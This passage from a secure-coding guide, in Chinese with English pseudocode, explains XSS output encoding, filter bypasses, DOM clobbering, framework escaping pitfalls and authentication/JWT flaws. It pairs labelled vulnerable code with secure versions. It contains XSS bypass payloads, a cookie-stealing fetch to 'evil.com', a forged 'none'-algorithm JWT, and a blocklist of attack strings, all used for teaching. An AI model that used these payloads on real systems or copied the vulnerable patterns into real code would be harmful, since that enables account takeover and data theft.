// SECURE: Context-specific encoding, not generic filtering
function outputToContext(value, context):
    switch context:
        case "html_body":
            return htmlEncode(value)
        case "html_attribute":
            return attributeEncode(value)
        case "javascript_string":
            return jsStringEncode(value)
        case "url_parameter":
            return urlEncode(value)
        case "css_value":
            return cssEncode(value)
        default:
            throw Error("Unknown context: " + context)

// Each encoder handles that specific context's dangerous characters

检测：在安全测试中使用多语言有效载荷来发现上下文混淆漏洞。

特殊情况 3：编码绕过技术

// DANGEROUS: Incomplete encoding can be bypassed

// Bypass 1: Case variation
// Filter checks: if "<script" in input: reject
// Bypass: "<ScRiPt>alert(1)</sCrIpT>"
// Browser: case-insensitive HTML parsing

// Bypass 2: HTML entities in event handlers
// Filter: remove "javascript:"
// Input: "&#106;avascript:alert(1)"
// Browser decodes entities before processing

// Bypass 3: Null bytes
// Input: "java\x00script:alert(1)"
// Some filters/WAFs don't handle null bytes
// Some browsers ignore them

// Bypass 4: Overlong UTF-8
// Normal '<': 0x3C
// Overlong: 0xC0 0xBC (invalid UTF-8, but some parsers accept)

// Bypass 5: Mixed encoding
// Input: "%3Cscript%3Ealert(1)%3C/script%3E"
// If HTML-encoded before URL-decoded, double encoding attack

// SECURE: Encode on output, not filter on input
function secureOutput(userInput, context):
    // Don't try to filter/blocklist dangerous patterns
    // DO encode appropriately for the output context

    // The encoding makes ALL user input safe
    // regardless of what it contains
    return encode(userInput, context)

// SECURE: Canonicalize THEN validate
function processInput(input):
    // 1. Decode all encoding layers
    decoded = fullyDecode(input)  // URL, HTML entities, etc.

    // 2. Normalize (lowercase, normalize unicode)
    normalized = normalize(decoded)

    // 3. Validate against rules
    if not isValid(normalized):
        reject()

    // 4. Store normalized form
    store(normalized)

    // 5. Encode on output (later)

关键见解：输出编码比输入过滤更可靠，因为您可以确切地知道输出上下文。

极端情况 4：DOM 覆盖

// DANGEROUS: HTML elements can override JavaScript globals

// How DOM clobbering works:
// Elements with id or name attributes create global variables
html = '<img id="alert">'
// Now: window.alert === <img> element
// alert(1) throws error instead of showing alert

// Exploitable clobbering:
html = '<form id="document"><input name="cookie" value="fake"></form>'
// document.cookie might now reference the input element

// Attack on sanitizer output:
html = '<a id="cid" name="cid" href="javascript:alert(1)">'
// If code does: location = document.getElementById(cid)
// Attacker controls the navigation

// More dangerous patterns:
html = '<form id="x"><input id="y"></form>'
// x.y now references the input
// Chains allow deep property access

// SECURE: Avoid global lookups for security-sensitive operations
function getConfigValue(key):
    // DON'T: return window[key]
    // DON'T: return document.getElementById(key).value

    // DO: Use a namespaced config object
    return APP_CONFIG[key]

// SECURE: Use unique prefixes for security-critical IDs
function getElementById(id):
    // Prefix with app-specific namespace
    return document.getElementById("app__" + id)

// SECURE: Validate types after DOM queries
function getFormElement(id):
    element = document.getElementById(id)
    if element instanceof HTMLFormElement:
        return element
    throw Error("Expected form element")

检测：使用以下方法测试：

ID 与 JavaScript 全局变量 ( alert, name, location)匹配的元素
名称与对象属性匹配的元素（cookie，domain）
嵌套表单，带有链式 name/id 属性

常见错误部分

错误一：编码一次，用于多个上下文

// DANGEROUS: Single encoding for multiple contexts

function saveUserProfile(name, bio):
    // Encoding once at input time
    safeName = htmlEncode(name)
    safeBio = htmlEncode(bio)

    database.save({name: safeName, bio: safeBio})

function displayProfile(user):
    // HTML context - HTML encoding was correct
    htmlOutput = "<h1>" + user.name + "</h1>"  // OK

    // But JavaScript context needs different encoding!
    jsOutput = "<script>var name = '" + user.name + "';</script>"
    // If name contained single quotes: "O'Brien" -> already encoded as "O&#x27;Brien"
    // Now in JS context, &#x27; is literal text, not a quote escape

    // And URL context is wrong too!
    urlOutput = "/profile?name=" + user.name
    // HTML entities in URL don't encode properly

// SECURE: Store raw data, encode on output
function saveUserProfile(name, bio):
    // Store raw (unencoded) user input
    database.save({name: name, bio: bio})

function displayProfile(user):
    // Encode specifically for each output context
    htmlName = htmlEncode(user.name)
    jsName = jsStringEncode(user.name)
    urlName = urlEncode(user.name)

    htmlOutput = "<h1>" + htmlName + "</h1>"
    jsOutput = "<script>var name = '" + jsName + "';</script>"
    urlOutput = "/profile?name=" + urlName

规则：存储原始数据。在输出时，根据具体上下文进行编码。

错误 2：仅客户端清理

// DANGEROUS: Relying only on client-side protection

// Client-side sanitization
function submitComment(comment):
    // Sanitize before sending to server
    cleanComment = DOMPurify.sanitize(comment)
    fetch("/api/comments", {
        method: "POST",
        body: JSON.stringify({comment: cleanComment})
    })

// Problem: Attacker bypasses client-side code entirely
// Using curl, Postman, or modified browser
curlCommand = """
curl -X POST https://site.com/api/comments \\
     -H "Content-Type: application/json" \\
     -d '{"comment": "<script>alert(1)</script>"}'
"""

// Server trusts the input because "client sanitized it"
function handleCommentApi(request):
    comment = request.body.comment
    database.saveComment(comment)  // Stored XSS!

// SECURE: Server-side sanitization is mandatory
function handleCommentApiSecure(request):
    comment = request.body.comment

    // Server-side sanitization
    cleanComment = serverSideSanitize(comment)

    database.saveComment(cleanComment)

function displayComment(comment):
    // Still encode on output (defense in depth)
    return htmlEncode(comment)

// NOTE: Client-side sanitization can still be useful for:
// - Preview functionality
// - Reducing server load
// - Better UX feedback
// But it must NEVER be the only protection

规则：服务器端编码/清理是强制性的。客户端是可选的增强功能。

错误三：黑名单方法

// DANGEROUS: Trying to block known-bad patterns

function filterXss(input):
    // Block list approach
    dangerous = [
        "<script", "</script>",
        "javascript:",
        "onerror", "onload", "onclick",
        "alert", "eval", "document.cookie"
    ]

    result = input
    for pattern in dangerous:
        result = result.replace(pattern, "")

    return result

// Bypasses:
// 1. Case: "<SCRIPT>alert(1)</SCRIPT>"
// 2. Encoding: "&#60;script&#62;alert(1)&#60;/script&#62;"
// 3. Null bytes: "<scr\x00ipt>alert(1)</scr\x00ipt>"
// 4. Other events: "onmouseover", "onfocus", "onanimationend"
// 5. Other sinks: "fetch('http://evil.com/'+document.cookie)"
// 6. New features: Future HTML/JS features not in blocklist

// DANGEROUS: Regex blocklist
function filterXssRegex(input):
    // Still bypassable
    if regex.match(/<script.*?>.*?<\/script>/i, input):
        return ""
    return input

// Bypass: "<scr<script>ipt>alert(1)</scr</script>ipt>"
// After removal: "<script>alert(1)</script>"

// SECURE: Allowlist approach
function sanitizeUsername(input):
    // Only allow expected characters
    if regex.match(/^[a-zA-Z0-9_-]{1,30}$/, input):
        return input
    throw ValidationError("Invalid username")

// SECURE: Proper encoding (makes blocklist unnecessary)
function displaySafely(input):
    return htmlEncode(input)  // All input is safe after encoding

规则：允许列表中包含预期内容，或者对所有内容进行编码。切勿将危险模式列入黑名单。

错误 4：盲目信任清理库

// DANGEROUS: Assuming sanitization handles everything

function processHtml(userHtml):
    // "The library handles XSS"
    clean = sanitizer.sanitize(userHtml)

    // But then using it unsafely:
    // 1. Wrong context
    return "<script>var content = '" + clean + "';</script>"
    // Sanitizer cleaned HTML context, not JavaScript context

    // 2. Double encoding
    clean = sanitizer.sanitize(htmlEncode(userHtml))
    // Now clean contains encoded entities that might decode later

    // 3. Post-processing that reintroduces vulnerabilities
    processed = clean.replace("[link]", "<a href='").replace("[/link]", "'>link</a>")
    // Custom processing after sanitization can break safety

// SECURE: Understand what the sanitizer does
function processHtmlSecure(userHtml):
    // 1. Sanitize for HTML context
    cleanHtml = DOMPurify.sanitize(userHtml, {
        ALLOWED_TAGS: ["p", "b", "i", "a"],
        ALLOWED_ATTR: ["href"]
    })

    // 2. Validate URLs in allowed href attributes
    dom = parseHtml(cleanHtml)
    for link in dom.querySelectorAll("a[href]"):
        if not isValidUrl(link.href):
            link.removeAttribute("href")

    // 3. Use only in HTML context
    return cleanHtml

// SECURE: For JavaScript context, don't use HTML sanitizer
function embedDataInJs(data):
    // JSON encoding is the appropriate "sanitizer" for JSON/JS
    return JSON.stringify(data)  // Handles all escaping for JSON

规则：针对不同上下文使用正确的编码/清理方法。清理方法与上下文相关。

框架特定指南（伪代码模式）

React模式

// React default: Auto-escaping in JSX
function UserProfile(props):
    // SAFE: React escapes by default
    return (
        <div>
            <h1>{props.username}</h1>    // Auto-escaped
            <p>{props.bio}</p>            // Auto-escaped
        </div>
    )

// DANGEROUS: dangerouslySetInnerHTML bypasses protection
function RichContent(props):
    // VULNERABLE if props.html is user-controlled
    return <div dangerouslySetInnerHTML={{__html: props.html}} />

// SECURE: Sanitize before using dangerouslySetInnerHTML
function RichContentSafe(props):
    sanitizedHtml = DOMPurify.sanitize(props.html)
    return <div dangerouslySetInnerHTML={{__html: sanitizedHtml}} />

// DANGEROUS: href with user input
function UserLink(props):
    // VULNERABLE: javascript: URLs execute
    return <a href={props.url}>{props.text}</a>

// SECURE: Validate URL scheme
function UserLinkSafe(props):
    url = props.url
    if not url.startsWith("http://") and not url.startsWith("https://"):
        url = "#"  // Safe fallback
    return <a href={url}>{props.text}</a>

Vue模式

// Vue default: Auto-escaping with {{ }}
<template>
    <!-- SAFE: Vue escapes interpolation -->
    <h1>{{ username }}</h1>
    <p>{{ bio }}</p>
</template>

// DANGEROUS: v-html bypasses protection
<template>
    <!-- VULNERABLE: v-html renders raw HTML -->
    <div v-html="userContent"></div>
</template>

// SECURE: Sanitize before v-html
<script>
export default {
    computed: {
        safeContent() {
            return DOMPurify.sanitize(this.userContent)
        }
    }
}
</script>
<template>
    <div v-html="safeContent"></div>
</template>

// DANGEROUS: Dynamic attribute binding
<template>
    <!-- VULNERABLE: javascript: in href -->
    <a :href="userUrl">Link</a>
</template>

// SECURE: URL validation
<script>
export default {
    computed: {
        safeUrl() {
            return this.isValidHttpUrl(this.userUrl) ? this.userUrl : '#'
        }
    }
}
</script>

角度图案

// Angular default: Auto-sanitization
@Component({
    template: `
        <!-- SAFE: Angular sanitizes -->
        <h1>{{ username }}</h1>
        <p>{{ bio }}</p>
    `
})

// Angular [innerHTML] is semi-safe (Angular sanitizes)
@Component({
    template: `
        <!-- Angular sanitizes, but still risky -->
        <div [innerHTML]="userContent"></div>
    `
})

// DANGEROUS: Bypassing sanitization
import { DomSanitizer } from '@angular/platform-browser'

@Component({...})
class MyComponent {
    constructor(private sanitizer: DomSanitizer) {}

    // VULNERABLE: Bypasses Angular's sanitization
    get unsafeHtml() {
        return this.sanitizer.bypassSecurityTrustHtml(this.userInput)
    }
}

// SECURE: Let Angular sanitize, or use additional sanitizer
@Component({...})
class MyComponentSafe {
    get safeHtml() {
        // Angular's default sanitization is usually sufficient
        // For extra safety, pre-sanitize
        return DOMPurify.sanitize(this.userInput)
    }
}

服务器端模板引擎模式

// Jinja2 (Python)
// SAFE: Auto-escaping by default
<h1>{{ username }}</h1>

// DANGEROUS: |safe filter
<div>{{ user_html | safe }}</div>  <!-- VULNERABLE -->

// Handlebars
// SAFE: {{ }} escapes
<h1>{{username}}</h1>

// DANGEROUS: {{{ }}} triple braces
<div>{{{user_html}}}</div>  <!-- VULNERABLE -->

// EJS (Node.js)
// SAFE: <%= %> escapes
<h1><%= username %></h1>

// DANGEROUS: <%- %> raw
<div><%- user_html %></div>  <!-- VULNERABLE -->

// SECURE PATTERN: Always use escaping syntax, sanitize if HTML needed
// Jinja2
<div>{{ user_html | sanitize }}</div>  <!-- Custom filter using DOMPurify -->

// Handlebars
<div>{{sanitize user_html}}</div>  <!-- Custom helper -->

// EJS
<div><%= sanitize(user_html) %></div>  <!-- Helper function -->

安全检查清单

所有以 HTML 形式呈现的用户输入都经过 HTML 编码。
所有用户在 HTML 属性中的输入都会进行属性编码并加引号。
所有用户输入的 JavaScript 字符串都会进行 JavaScript 编码。
所有用户在 URL 中输入的内容都会进行 URL 编码（并对链接进行方案验证）。
CSS 中的所有用户输入都经过 CSS 编码或允许列表验证。
innerHTMLdocument.write避免使用、、以及类似情况，或使用经过处理的输入。
textContentinnerHTML尽可能使用。
dangerouslySetInnerHTML等v-html仅|safe用于已消毒的内容
已验证 URL 协议（仅允许 http/https，不允许使用 javascript:)
已实现服务器端编码/清理（而不仅仅是客户端）
编码在输出时执行，具体编码方式取决于上下文。
当需要输入丰富的 HTML 代码时，会使用 HTML 清理器（DOMPurify）。
内容安全策略 (CSP) 标头已实施
已设置 X-XSS-Protection 和 X-Content-Type-Options 标头
已设置 Cookie HttpOnly 标志以阻止 JavaScript 访问
没有用户输入到达 eval()、new Function() 或 setTimeout（使用字符串）。
框架自动转义功能已启用且未被绕过。

模式 4：身份验证和会话安全

CWE 参考： CWE-287（身份验证不当）、CWE-384（会话固定）、CWE-613（会话过期时间不足）、CWE-307（对过多身份验证尝试的限制不当）、CWE-308（使用单因素身份验证）、CWE-640（密码恢复机制薄弱）、CWE-1275（具有不当 SameSite 属性的敏感 Cookie）

优先级评分： 22（频率：8，严重性：9，可检测性：5）

引言：高复杂度导致高人工智能错误率

身份验证和会话管理是应用程序开发中最复杂的安全领域之一。由于以下几个相互关联的原因，人工智能模型尤其难以处理这些模式：

为什么人工智能模型会生成不安全的身份验证码：

复杂性催生捷径：身份验证需要协调多个组件——密码存储、会话管理、令牌生成、Cookie 处理和注销流程。人工智能模型为了简化操作，常常会生成一些“可运行”的代码，但这些代码往往会省略一些必要的安全层。
教程综合症：训练数据中充斥着大量简化的身份验证教程，这些教程旨在讲解概念，而非构建生产系统。这些教程通常忽略速率限制、安全令牌生成、正确的会话失效机制以及时序攻击防御等内容。
JWT 误解： JSON Web Tokens 已成为默认推荐，但 AI 模型经常生成存在严重缺陷的 JWT 实现——“none”算法漏洞、弱密钥、验证不当和存储不安全。
框架多样性：不同框架（Passport.js、Spring Security、Django、Rails Devise 等）的身份验证模式差异巨大。人工智能模型会将不同框架的模式混淆，生成既不适用于任何框架也不安全的混合代码。
无状态认证与有状态认证的混淆：向无状态认证（JWT）的转变导致训练数据中出现混合模式。人工智能经常将无状态令牌概念与有状态会话假设相结合，从而造成安全方面的逻辑漏洞。
边缘案例盲点：身份验证边缘案例（并发会话、密码重置流程、帐户恢复、多因素身份验证和 OAuth 状态管理）需要深入的安全思考，而人工智能模型无法可靠地产生这些思考。

影响统计数据：

75.8%的开发者认为 AI 生成的身份验证码是安全的（Snyk 2024 年 AI 安全状况调查）
63%的数据泄露事件涉及弱密码、默认密码或被盗密码（Verizon DBIR 2024）
身份验证绕过漏洞占Web 应用程序严重漏洞的41% （HackerOne 报告）
凭证填充攻击的平均成本：430万美元（Ponemon研究所）
只有23%的 AI 生成的身份验证代码能够正确实现注销时的会话失效。

反例：多种表现形式

不良示例 1：弱密码验证

// VULNERABLE: Minimal password requirements
function validatePassword(password):
    if length(password) < 6:
        return false
    return true

// VULNERABLE: Only checks length, no complexity
function registerUser(email, password):
    if length(password) >= 8:  // "Strong enough"
        hashedPassword = hashPassword(password)
        createUser(email, hashedPassword)
        return success
    return error("Password too short")

// VULNERABLE: Pattern allows easy-to-guess passwords
function isValidPassword(password):
    // Only requires one of each - easily satisfied by "Password1!"
    hasUpper = containsUppercase(password)
    hasLower = containsLowercase(password)
    hasNumber = containsNumber(password)
    hasSpecial = containsSpecialChar(password)

    if hasUpper and hasLower and hasNumber and hasSpecial:
        return true
    return false
    // Missing: dictionary check, common password check, breach check

为什么这样做很危险：

允许使用类似“123456”、“password”或“qwerty123”这样的密码
无法防范常用密码列表
未检查是否已泄露的密码（Have I Been Pwned）
模式要求很容易通过可预测的密码（例如“Password1!”）来满足。
利用现代硬件，攻击者可以在几秒钟内破解弱密码。

反例 2：可预测的会话令牌

// VULNERABLE: Sequential session IDs
sessionCounter = 1000

function generateSessionId():
    sessionCounter = sessionCounter + 1
    return "session_" + toString(sessionCounter)

// VULNERABLE: Time-based session generation
function createSessionToken():
    timestamp = getCurrentTimestamp()
    return "sess_" + toString(timestamp)

// VULNERABLE: Weak random source
function generateToken():
    return "token_" + toString(randomInteger(0, 999999))

// VULNERABLE: MD5 of predictable data
function createAuthToken(userId):
    timestamp = getCurrentTimestamp()
    return md5(toString(userId) + toString(timestamp))

// VULNERABLE: User-controlled seed
function generateSessionId(userId, email):
    seed = userId + email + getCurrentDate()
    return sha256(seed)  // Deterministic - same inputs = same output

为什么这样做很危险：

序列 ID 允许会话枚举——攻击者可以猜测有效的会话。
如果攻击者知道大致的创建时间，就可以预测基于时间戳的令牌。
弱随机数（Math.random、random.randint）可以通过统计分析进行预测。
MD5 计算速度快，因此可以进行暴力破解攻击。
用户控制的令牌生成输入使得攻击者能够预测令牌。

不良示例 3：会话固定漏洞

// VULNERABLE: Session ID not regenerated after login
function login(request):
    email = request.body.email
    password = request.body.password

    user = findUserByEmail(email)
    if user and verifyPassword(password, user.hashedPassword):
        // Using the SAME session ID from before authentication
        request.session.userId = user.id
        request.session.authenticated = true
        return redirect("/dashboard")
    return error("Invalid credentials")

// VULNERABLE: Accepting session ID from URL parameter
function handleRequest(request):
    sessionId = request.query.sessionId or request.cookies.sessionId
    // Attacker can send victim: https://app.com/login?sessionId=attacker_controlled_session
    session = loadSession(sessionId)

// VULNERABLE: Not invalidating session on privilege change
function promoteToAdmin(request):
    user = getCurrentUser(request)
    user.role = "admin"
    user.save()
    // Same session continues - if session was compromised before,
    // attacker now has admin access
    return success("You are now an admin")

为什么这样做很危险：

攻击者设置会话 ID → 受害者登录 → 攻击者使用与受害者已认证会话相同的会话 ID
基于 URL 的会话 ID 可以记录在服务器日志、浏览器历史记录和引用标头中。
权限提升且未进行会话重建意味着被入侵的会话将获得更高的访问权限。

错误示例 4：JWT“无”算法接受

// VULNERABLE: Decoding JWT without algorithm verification
function verifyJwt(token):
    parts = token.split(".")
    header = base64Decode(parts[0])
    payload = base64Decode(parts[1])

    // Trusting the algorithm from the token header itself!
    algorithm = header.alg

    if algorithm == "none":
        return payload  // No signature check!

    signature = parts[2]
    if verifySignature(payload, signature, algorithm):
        return payload
    return null

// VULNERABLE: Using jwt library without specifying expected algorithm
function validateToken(token):
    try:
        // Library may accept 'none' algorithm if token specifies it
        decoded = jwt.decode(token, secretKey)
        return decoded
    catch:
        return null

// VULNERABLE: Allowing multiple algorithms including none
function verifyToken(token, secret):
    options = {
        algorithms: ["HS256", "HS384", "HS512", "none"]  // DANGEROUS
    }
    return jwt.verify(token, secret, options)

为什么这样做很危险：

攻击者修改 JWT 标头以指定alg: "none"并移除签名。
服务器接受未签名的令牌作为有效令牌。
此漏洞已影响多种语言的主要 JWT 库。
完全绕过身份验证——攻击者可以冒充任何用户

漏洞利用示例：

// Original legitimate token:
// Header: {"alg":"HS256","typ":"JWT"}
// Payload: {"sub":"1234","role":"user"}
// Signature: valid_signature_here

// Attacker-modified token:
// Header: {"alg":"none","typ":"JWT"}  ← Changed to "none"
// Payload: {"sub":"1234","role":"admin"}  ← Changed to admin
// Signature: (empty)  ← Removed

// If server trusts header.alg, this forged token is accepted as valid

反例 5：弱 JWT 密钥

// VULNERABLE: Short/guessable secret
JWT_SECRET = "secret"

// VULNERABLE: Common secrets from tutorials
JWT_SECRET = "your-256-bit-secret"
JWT_SECRET = "supersecretkey"
JWT_SECRET = "jwt-secret-key"

// VULNERABLE: Empty or null secret
function createToken(payload):
    secret = getConfig("JWT_SECRET") or ""  // Falls back to empty string
    return jwt.sign(payload, secret, {algorithm: "HS256"})

// VULNERABLE: Secret derived from predictable data
function getJwtSecret():
    return sha256(APPLICATION_NAME + "-" + ENVIRONMENT)
    // If attacker knows app name and environment, they can derive the secret

// VULNERABLE: Same secret for signing and encryption
JWT_SECRET = "shared_secret_for_everything"
function signToken(payload):
    return jwt.sign(payload, JWT_SECRET)
function encryptData(data):
    return aesEncrypt(data, JWT_SECRET)  // Key reuse vulnerability

为什么这样做很危险：

弱密钥可以通过暴力破解或在字典中找到。
常用教程密钥都保存在公开的 JWT 密钥数据库中。
某些 JWT 库可能接受空密钥。
秘密泄露手段可以伪造任何 JWT，从而完全绕过身份验证。
在不同的加密操作中重复使用密钥违反了安全原则。

错误示例 6：将令牌存储在 localStorage 中

// VULNERABLE: Storing JWT in localStorage
function handleLoginResponse(response):
    accessToken = response.data.accessToken
    refreshToken = response.data.refreshToken

    // localStorage is accessible to ANY JavaScript on the page
    localStorage.setItem("access_token", accessToken)
    localStorage.setItem("refresh_token", refreshToken)

    // Also stored user data in localStorage
    localStorage.setItem("user", JSON.stringify(response.data.user))

// VULNERABLE: Retrieving token for API calls
function apiRequest(endpoint, data):
    token = localStorage.getItem("access_token")
    return fetch(endpoint, {
        headers: {
            "Authorization": "Bearer " + token
        },
        body: JSON.stringify(data)
    })

// VULNERABLE: Token in sessionStorage (same problem)
function storeToken(token):
    sessionStorage.setItem("jwt", token)

为什么这样做很危险：

页面上运行的任何 JavaScript 代码都可以访问 localStorage。
XSS漏洞 = 完全身份验证被攻破
令牌在浏览器会话之间持久存在（localStorage）
没有针对浏览器扩展程序读取存储的保护措施
本地存储中的刷新令牌允许长期接管帐户。

错误示例 7：缺少令牌过期时间

// VULNERABLE: JWT without expiration
function createUserToken(user):
    payload = {
        userId: user.id,
        email: user.email,
        role: user.role
        // No "exp" claim!
    }
    return jwt.sign(payload, JWT_SECRET)

// VULNERABLE: Extremely long expiration
function generateToken(user):
    payload = {
        sub: user.id,
        iat: now(),
        exp: now() + (365 * 24 * 60 * 60)  // 1 year expiration
    }
    return jwt.sign(payload, JWT_SECRET)

// VULNERABLE: Trusting token-provided expiration without server check
function validateToken(token):
    decoded = jwt.verify(token, JWT_SECRET)
    // JWT library checks exp, but server has no session to revoke
    // Compromised tokens valid until natural expiration
    return decoded

// VULNERABLE: No mechanism to invalidate tokens
function logout(request):
    response.clearCookie("token")
    return success("Logged out")
    // Token is still valid! Anyone with the token can still use it

为什么这样做很危险：

如果密钥不更改，则无过期令牌将永久有效。
长期有效的令牌会延长攻击者的攻击窗口。
没有服务器端失效机制意味着被盗用的令牌无法撤销。
注销只会从客户端移除令牌，但不会使其失效。
即使更改密码，被盗令牌仍然有效。

优秀示例：安全身份验证模式

优秀示例 1：强密码要求模式

// SECURE: Comprehensive password validation
import commonPasswordList from "common-passwords-database"
import breachedPasswordApi from "haveibeenpwned-api"

function validatePasswordStrength(password):
    errors = []

    // Minimum length (NIST recommends 8+, many orgs use 12+)
    if length(password) < 12:
        errors.push("Password must be at least 12 characters")

    // Maximum length (prevent DoS from hashing extremely long passwords)
    if length(password) > 128:
        errors.push("Password cannot exceed 128 characters")

    // Check against common password list (10,000+ passwords)
    if password.toLowerCase() in commonPasswordList:
        errors.push("This password is too common")

    // Check against user-specific data (optional but recommended)
    // - Don't allow email prefix as password
    // - Don't allow username as password

    // Check against breached passwords (Have I Been Pwned API)
    if await checkBreachedPassword(password):
        errors.push("This password has appeared in a data breach")

    if length(errors) > 0:
        return { valid: false, errors: errors }

    return { valid: true, errors: [] }

// SECURE: Check breached passwords using k-anonymity (no password exposure)
async function checkBreachedPassword(password):
    // Hash password with SHA-1 (HIBP API requirement)
    hash = sha1(password).toUpperCase()
    prefix = hash.substring(0, 5)
    suffix = hash.substring(5)

    // Only send first 5 characters - k-anonymity preserves privacy
    response = await fetch("https://api.pwnedpasswords.com/range/" + prefix)
    hashes = response.text()

    // Check if our suffix appears in the returned hashes
    for line in hashes.split("\n"):
        parts = line.split(":")
        if parts[0] == suffix:
            return true  // Password has been breached

    return false

// SECURE: Password hashing with proper algorithm
function hashPassword(password):
    // bcrypt with cost factor of 12 (adjust based on hardware)
    // Alternatively: argon2id with recommended parameters
    return bcrypt.hash(password, 12)

function verifyPassword(password, hash):
    return bcrypt.compare(password, hash)

为什么说它是安全的：

长度要求会阻止过于短小的密码。
常见的密码检查机制可以阻止字典攻击
漏洞检查可防止利用已知漏洞进行凭证填充攻击。
k-匿名性可确保在安全检查期间密码不会泄露。
bcrypt/argon2 提供具有有效工作因子的正确密码哈希算法

优秀示例 2：安全会话生成

// SECURE: Cryptographically random session IDs
import cryptoRandom from "secure-random-library"

function generateSessionId():
    // 256 bits of cryptographically secure randomness
    // Represented as 64 hex characters
    randomBytes = cryptoRandom.getRandomBytes(32)
    return bytesToHex(randomBytes)

// SECURE: Session creation with proper attributes
function createSession(userId):
    sessionId = generateSessionId()

    sessionData = {
        id: sessionId,
        userId: userId,
        createdAt: now(),
        expiresAt: now() + SESSION_DURATION,  // e.g., 24 hours
        lastActivityAt: now(),
        ipAddress: getClientIP(),
        userAgent: getUserAgent()
    }

    // Store in server-side session store (Redis, database, etc.)
    sessionStore.save(sessionId, sessionData)

    return sessionId

// SECURE: Session ID regeneration after authentication
function login(request):
    email = request.body.email
    password = request.body.password

    user = findUserByEmail(email)
    if not user:
        return error("Invalid credentials")  // Don't reveal if email exists

    if not verifyPassword(password, user.hashedPassword):
        recordFailedLogin(user.id, getClientIP())
        return error("Invalid credentials")

    // CRITICAL: Destroy old session and create new one
    if request.session.id:
        sessionStore.delete(request.session.id)

    // Generate completely new session ID after authentication
    newSessionId = createSession(user.id)

    // Set session cookie with secure attributes
    response.setCookie("session_id", newSessionId, {
        httpOnly: true,      // Prevent XSS access
        secure: true,        // HTTPS only
        sameSite: "Strict",  // CSRF protection
        path: "/",
        maxAge: SESSION_DURATION
    })

    return redirect("/dashboard")

// SECURE: Session regeneration on privilege change
function changeUserRole(request, newRole):
    user = getCurrentUser(request)

    // Change the role
    user.role = newRole
    user.save()

    // Regenerate session to bind new privileges to fresh session
    oldSessionId = request.cookies.session_id
    sessionStore.delete(oldSessionId)

    newSessionId = createSession(user.id)

    response.setCookie("session_id", newSessionId, {
        httpOnly: true,
        secure: true,
        sameSite: "Strict"
    })

    return success("Role updated")

为什么说它是安全的：

加密随机会话 ID 可防止预测/枚举
登录后会话重新生成可防止会话固定。
权限变更会触发会话重新生成
安全的 Cookie 属性可以防止常见的攻击途径
服务器端会话存储允许正确的失效操作。

优秀示例 3：正确的 JWT 验证

// SECURE: JWT configuration with strict settings
JWT_CONFIG = {
    secret: getEnv("JWT_SECRET"),  // 256+ bit secret from environment
    algorithms: ["HS256"],          // Single allowed algorithm - explicit!
    issuer: "myapp.example.com",
    audience: "myapp-users",
    expiresIn: "15m"                // Short-lived access tokens
}

// SECURE: Token creation with explicit claims
function createAccessToken(user):
    payload = {
        sub: toString(user.id),
        email: user.email,
        role: user.role,
        iss: JWT_CONFIG.issuer,
        aud: JWT_CONFIG.audience,
        iat: now(),
        exp: now() + (15 * 60),     // 15 minutes
        jti: generateUUID()          // Unique token ID for revocation
    }

    return jwt.sign(payload, JWT_CONFIG.secret, {
        algorithm: "HS256"           // Explicit algorithm
    })

// SECURE: Token verification with all claims checked
function verifyAccessToken(token):
    try:
        decoded = jwt.verify(token, JWT_CONFIG.secret, {
            algorithms: ["HS256"],   // ONLY accept HS256
            issuer: JWT_CONFIG.issuer,
            audience: JWT_CONFIG.audience,
            complete: true           // Return header + payload
        })

        // Additional validation
        if not decoded.payload.sub:
            return { valid: false, error: "Missing subject" }

        if not decoded.payload.role:
            return { valid: false, error: "Missing role" }

        // Check against token blacklist (for logout/revocation)
        if await isTokenRevoked(decoded.payload.jti):
            return { valid: false, error: "Token revoked" }

        return { valid: true, payload: decoded.payload }

    catch JwtExpiredError:
        return { valid: false, error: "Token expired" }
    catch JwtInvalidError as e:
        return { valid: false, error: "Invalid token: " + e.message }

// SECURE: Refresh token handling
function createRefreshToken(user, sessionId):
    payload = {
        sub: toString(user.id),
        sid: sessionId,              // Bind to session for revocation
        type: "refresh",
        iat: now(),
        exp: now() + (7 * 24 * 60 * 60)  // 7 days
    }

    token = jwt.sign(payload, JWT_CONFIG.secret + "_refresh", {
        algorithm: "HS256"
    })

    // Store refresh token hash in database for revocation
    tokenHash = sha256(token)
    storeRefreshToken(user.id, sessionId, tokenHash, payload.exp)

    return token

// SECURE: Refresh flow with rotation
function refreshAccessToken(refreshToken):
    try:
        decoded = jwt.verify(refreshToken, JWT_CONFIG.secret + "_refresh", {
            algorithms: ["HS256"]
        })

        // Verify refresh token is still valid in database
        tokenHash = sha256(refreshToken)
        storedToken = getRefreshToken(decoded.sub, tokenHash)

        if not storedToken or storedToken.revoked:
            return { error: "Refresh token invalid or revoked" }

        // Rotate refresh token (issue new one, revoke old)
        revokeRefreshToken(tokenHash)

        user = findUserById(decoded.sub)
        newAccessToken = createAccessToken(user)
        newRefreshToken = createRefreshToken(user, decoded.sid)

        return {
            accessToken: newAccessToken,
            refreshToken: newRefreshToken
        }

    catch:
        return { error: "Invalid refresh token" }

为什么说它是安全的：

明确的算法规范可以防止算法混淆攻击。
有效期较短的访问令牌可最大限度地减少暴露窗口。
JTI（JWT ID）支持令牌撤销
刷新令牌轮换限制了重复攻击
完成索赔验证（iss、aud、exp、sub）
访问令牌和刷新令牌使用不同的密钥

优秀示例 4：HttpOnly 安全 Cookie 使用

// SECURE: Cookie-based session with proper attributes
function setSessionCookie(response, sessionId):
    response.setCookie("session_id", sessionId, {
        httpOnly: true,      // Cannot be accessed via JavaScript
        secure: true,        // Only sent over HTTPS
        sameSite: "Strict",  // Not sent with cross-site requests
        path: "/",           // Available for all paths
        domain: ".myapp.com", // Scoped to main domain and subdomains
        maxAge: 24 * 60 * 60  // 24 hours in seconds
    })

// SECURE: JWT in cookie (not localStorage)
function setAuthCookies(response, accessToken, refreshToken):
    // Access token - short lived, same-site strict
    response.setCookie("access_token", accessToken, {
        httpOnly: true,
        secure: true,
        sameSite: "Strict",
        path: "/",
        maxAge: 15 * 60       // 15 minutes
    })

    // Refresh token - limited path to reduce exposure
    response.setCookie("refresh_token", refreshToken, {
        httpOnly: true,
        secure: true,
        sameSite: "Strict",
        path: "/auth/refresh",  // Only sent to refresh endpoint
        maxAge: 7 * 24 * 60 * 60  // 7 days
    })

// SECURE: Cookie cleanup on logout
function clearAuthCookies(response):
    // Set cookies with immediate expiration
    response.setCookie("access_token", "", {
        httpOnly: true,
        secure: true,
        sameSite: "Strict",
        path: "/",
        maxAge: 0             // Immediate expiration
    })

    response.setCookie("refresh_token", "", {
        httpOnly: true,
        secure: true,
